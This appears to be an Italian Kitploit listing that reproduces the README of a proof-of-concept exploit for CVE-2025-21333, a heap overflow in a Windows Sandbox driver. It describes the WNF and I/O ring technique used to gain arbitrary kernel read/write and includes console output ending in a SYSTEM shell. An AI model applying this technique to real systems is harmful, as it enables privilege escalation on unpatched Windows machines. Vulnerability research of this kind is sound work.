Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-21333-POC — Exploit POC per il buffer overflow basato su heap CVE-2025-21333. Sfrutta i dati di stato WNF e l'I/O ring IOP_MC_BUFFER_ENTRY. | Kitploit
Strumenti/GitHubGitHub/mrale98/cve-2025-21333-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitBinary Exploitation
GitHubmrale98/cve-2025-21333-poc

CVE-2025-21333-POC

Exploit POC per il buffer overflow basato su heap CVE-2025-21333. Sfrutta i dati di stato WNF e l'I/O ring IOP_MC_BUFFER_ENTRY.

Vedi Repository
232361 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-21333-POC

Proof of Concept che sfrutta CVE-2025-21333 in vkrnlintvsp.sys (non molto affidabile, vedere la sezione Requisiti e limitazioni). Nella sezione Riferimenti si trovano risorse molto utili per chi vuole giocare con l'exploit.

Un'analisi dettagliata della vulnerabilità e dell'exploit è disponibile qui.

La vulnerabilità è stata rilevata come sfruttata attivamente da attori delle minacce.

Testato su Windows 11 23h2.

Potrebbe funzionare anche su Windows 11 24h2 ma non l'ho testato.

Di seguito l'hash dei file ntoskrnl.exe e vkrnlintvsp.sys che sono stati usati per testare il POC.

root@kitploit:~
PS C:\Windows\System32\drivers> get-filehash .\vkrnlintvsp.sys

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          28948C65EF108AA5B43E3D10EE7EA7602AEBA0245305796A84B4F9DBDEDDDF77       C:\Windows\System32\drivers\v...

PS C:\Windows\System32\drivers>
root@kitploit:~
PS C:\Windows\System32> Get-FileHash ntoskrnl.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          999C51D12CDF17A57054068D909E88E1587A9A715F15E0DE9E32F4AA4875C473       C:\Windows\System32\ntoskrnl.exe

PS C:\Windows\System32>

Sovrascrittura della voce del buffer I/O Ring per ottenere lettura/scrittura arbitraria

Non usa NtQuerySystemInformation per divulgare indirizzi del kernel né PreviousMode per ottenere lettura/scrittura arbitraria.

Invece, alloca nel Paged Pool un array di puntatori a _IOP_MC_BUFFER_ENTRY e sovrascrive il primo puntatore con un IOP_MC_BUFFER_ENTRY* malevolo situato nello spazio utente. Usando BuildIoRingWriteFile()/BuildIoRingReadFile() è possibile ottenere lettura/scrittura arbitraria nel kernel.

L'array di puntatori a _IOP_MC_BUFFER_ENTRY è un oggetto con PoolTag IrRB.

La tecnica differisce leggermente da quella documentata da Yarden Shafir qui. Invece di prendere il controllo dell'intero array puntato da _IORING_OBJECT.RegBuffers, la tecnica prende il controllo solo di una voce nell'array puntato da _IORING_OBJECT.RegBuffers.

Poiché la dimensione dell'array di puntatori è controllabile dall'utente, ciò significa che può essere utilizzato per ottenere una lettura/scrittura arbitraria affidabile in ring0 a partire da heap-overflow e UAF per diversi bucket LFH.

Non so se qualcuno abbia già condiviso questa tecnica per sfruttare overflow o UAF nel paged pool.

Questi screenshot sono stati scattati dopo l'esecuzione del poc. L'overflow era nel bucket per oggetti di dimensione 0x50. Nota che è stato possibile allocare un array RegBuffers in quel bucket e il primo puntatore punta a memoria nello spazio utente.

image

Nota che la voce malevola imposta Address su un oggetto processo. Address corrisponde all'indirizzo arbitrario da cui potremmo voler leggere/scrivere (questo è già ben descritto nell'articolo di Yarden Shafir).

image

Requisiti e limitazioni

È necessario attivare la funzionalità Windows Sandbox affinché le syscall vulnerabili vengano gestite dal driver vulnerabile.

image

Sono riuscito a ottenere un overflow di 0xfff0 byte. Non sono riuscito a rendere la lunghezza dell'overflow completamente controllabile. Si può vedere un crash se l'overflow è più grande del sottosegmento (può accadere abbastanza spesso). Forse sprayando più oggetti è possibile minimizzare questo comportamento.

Il poc libera 2 dati di stato WNF per riallocare in quelle posizioni un regBuffer (un array di puntatori a _IOP_MC_BUFFER_ENTRY associato a un IORING_OBJECT) e un PipeAttribute. A volte, tra la free e la riallocazione, può accadere che un altro oggetto venga allocato in quella posizione da un altro driver. Sarebbe possibile usare altri oggetti WNF state data corrotti in un ciclo while per eseguire più tentativi di riallocazione e aumentare la possibilità di ottenere il layout desiderato.

Il codice del poc è piuttosto disordinato.

Dopo aver ottenuto system, è meglio uscire dalla shell di sistema digitando exit nella console, altrimenti la macchina andrà in crash.

Compilare ed eseguire

Compilare la versione Release x64.

Eseguire e ottenere una shell di sistema.

root@kitploit:~
PS C:\Users\unpriv> .\CVE-2025-21333-POC.exe
Preparing...
[*] fNtCreateCrossVmEvent = 00007FFD6BC31690
[*] fNtQueryInformationProcess = 00007FFD6BC304E0
[!] WindowsSandboxClient.exe process not found
[*] spawning windows sandbox
[*] CreateProcessA returned successfully
[*] NtQueryInformationProcess returned successfully
[*] peb_addr = 0000000100335000
[*] ReadProcessMemory returned successfully
[*] ProcessParameters = 00000147B06A6430
[*] ReadProcessMemory returned successfully
[*] CommandLine = 00000147B06A6ADA
[*] CommandLine_size = 3f0
[*] commandline = C:\Windows\system32\WindowsSandboxClient.exe <ContainerId>19a1ef14-ee35-47d8-8bdb-cf4c86272272</ContainerId><AccountUser>WDAGUtilityAccount</AccountUser><AccountPassword>66387310-a27d-4a59-a688-3ab018388c9e</AccountPassword><AudioInputEnabled>true</AudioInputEnabled><ClipboardRedirectionEnabled>true</ClipboardRedirectionEnabled><RebootSupported>true</RebootSupported><SmartCardRedirectionEnabled>false</SmartCardRedirectionEnabled><FullScreenMode>false</FullScreenMode><TargetDisplay>0</TargetDisplay>
[*] extracted guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
[*] s_guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
Created GUID
extracted guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72  ....5..G...L.'"r


guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72  ....5..G...L.'"r


Triggering vuln creating crossvmevent...
max corrupted WNF
state: a18d294541c64e6d val: 0  dataSize: 10040
calling NtqueryWnfStateData on max_corrupted with max_corrupted->state a18d2945a18d2945 and datasize10040
buffer content
[+] found WNF to be freed and replaced with RegBuffers
offset 30
[+] found WNF to be freed and replaced with PipeAttribute
offset2 80
updating regBuffersControllerWNF
calling NtUpdateWnfStateData on tokenReaderWNF->state a18d2945a18d2945 and datasize10040
calling NtUpdateWnfStateData returned successfully
[*] retrieving WNF with content 0x4343434343434343
[*] retrieving WNF with content 0x4444444444444444
searching in statenames2
found corrupted WNF: a18d514541c64e6dval: 4343434343434343
found corrupted WNF: a18d614541c64e6dval: 4444444444444444
found1 1 found2 1
found1 1 found2 1
found1 1 found2 1
0x000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000030: 00 00 05 0b 49 72 52 42 64 b9 76 d3 e4 ff d1 c6  ....IrRBd.v.....
0x000040: a0 a1 b1 f1 09 e3 ff ff 00 00 00 00 00 00 00 00  ................
0x000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000080: 00 00 05 03 4e 70 41 74 00 00 00 00 00 00 00 00  ....NpAt........
0x000090: d0 01 2b 47 0a d1 ff ff d0 01 2b 47 0a d1 ff ff  ..+G......+G....
0x0000a0: 38 81 2a 4d 0a d1 ff ff 16 00 00 00 00 00 00 00  8.*M............
0x0000b0: 3a 81 2a 4d 0a d1 ff ff 5a 00 41 41 41 41 41 41  :.*M....Z.AAAAAA
0x0000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0x0000d0: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42  ....Wnf BBBBBBBB
0x0000e0: 00 00 00 00 50 ff 00 00 50 ff 00 00 01 00 00 00  ....P...P.......
0x0000f0: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000120: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42  ....Wnf BBBBBBBB
0x000130: 00 00 00 00 00 ff 00 00 00 ff 00 00 01 00 00 00  ................
0x000140: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................


[+] regBuffers found and can be overwritten
[+] pipeAttribute found and can be read
[*] original_regBufferEntry: ffffe309f1b1a1a0
[*] pipeAttributeFlink: ffffd10a472b01d0
[+] found target handle
[*] targetHandle: 00000211216BC4D0
[*] ioring index: 425
[*] fileObject: ffffe309f134d7e0
[*] base of npfs.sys: fffff80631660000
[*] base of ntoskrnl.exe: fffff80628c00000
[*] system EPROCESS: ffffe309ea4c2040
[*] system TOKEN: ffffd10a3a246040
[*] curpid: 21c8
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.

C:\Users\unpriv>whoami
nt authority\system

C:\Users\unpriv>exit
calling NtUpdateWnfStateData returned successfully
PS C:\Users\unpriv>

Riferimenti

  • https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pool_overflow_exploitation_since_windows_10_19h1/SSTIC2020-Article-pool_overflow_exploitation_since_windows_10_19h1-bayet_fariello.pdf
  • https://www.nccgroup.com/us/research-blog/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/
  • https://windows-internals.com/one-i-o-ring-to-rule-them-all-a-full-read-write-exploit-primitive-on-windows-11/

Ringraziamenti

  • @cbayet
  • @paulfariello
  • @alexjplaskett
  • @yarden_shafir
Scarica lo strumento